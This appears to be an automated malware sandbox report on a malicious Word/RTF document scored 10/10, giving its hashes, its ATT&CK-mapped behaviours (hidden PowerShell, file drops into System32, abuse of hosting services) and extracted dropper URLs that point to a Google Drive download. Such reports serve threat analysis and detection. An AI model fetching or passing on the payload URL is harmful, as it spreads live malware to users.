Overview

overview

10

Static

static

1

ba2a2df52c...4c.rtf

windows7-x64

10

ba2a2df52c...4c.rtf

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ba2a2df52cd4c726184d39828a4a4f91ee521c291341b390f3c2647732d6714c.doc

  • Size

    107KB

  • Sample

    241028-dqnpdszbpn

  • MD5

    86157210cf13494bbeb9d4808652a687

  • SHA1

    76accace803a0268674ccf47bf316b7cfb11b49f

  • SHA256

    ba2a2df52cd4c726184d39828a4a4f91ee521c291341b390f3c2647732d6714c

  • SHA512

    718e06631d33bad1033fed7878471a1ea21db5d5bf14e2730407d807e7ff07b1b078f8adf89083a31b32a6e16883bcf6c01561e39c7246f943d5ee897a8af6e7

  • SSDEEP

    768:3dGKS4gI3wTHfrwJDJB8C6CpojhM2D0G1p8Q:3dGKS4/f978zCClM40LQ

Score
10/10
defense_evasiondiscoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Targets

    • Target

      ba2a2df52cd4c726184d39828a4a4f91ee521c291341b390f3c2647732d6714c.doc

    • Size

      107KB

    • MD5

      86157210cf13494bbeb9d4808652a687

    • SHA1

      76accace803a0268674ccf47bf316b7cfb11b49f

    • SHA256

      ba2a2df52cd4c726184d39828a4a4f91ee521c291341b390f3c2647732d6714c

    • SHA512

      718e06631d33bad1033fed7878471a1ea21db5d5bf14e2730407d807e7ff07b1b078f8adf89083a31b32a6e16883bcf6c01561e39c7246f943d5ee897a8af6e7

    • SSDEEP

      768:3dGKS4gI3wTHfrwJDJB8C6CpojhM2D0G1p8Q:3dGKS4/f978zCClM40LQ

    Score
    10/10
    defense_evasiondiscoveryexecution

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Evasion via Device Credential Deployment

      defense_evasionexecution

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks